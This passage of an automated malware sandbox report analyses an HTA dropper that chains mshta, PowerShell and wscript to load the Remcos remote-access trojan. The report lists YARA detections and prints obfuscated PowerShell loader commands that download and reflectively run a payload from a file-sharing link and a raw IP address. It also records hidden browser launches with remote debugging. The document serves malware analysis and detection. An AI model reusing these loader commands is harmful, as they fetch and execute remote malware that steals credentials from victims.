                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040513324_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004051A424_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040124624_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040CA4624_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040523524_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004032C824_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040168924_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00402F6024_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 1000A5A6 appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 1000B100 appears 33 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00416760 appears 69 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2066
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2286
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2066Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2286Jump to behavior
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 8092, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@69/150@25/9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,18_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,24_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,18_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A63F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\createthebestthingswithgoodthingsbestforgreatthingsformeevengood[1].tiffJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-EC111K
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1xpek3d.jrk.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: HandleInformation
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: CasPol.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: CasPol.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: CasPol.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: CasPol.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: CasPol.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: CasPol.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaReversingLabs: Detection: 21%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD4B.tmp" "c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYX
RpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nupmhthbjzo"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1972,i,17397243976134850236,17257031585275351317,262144 /prefetch:3
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6784 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6888 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
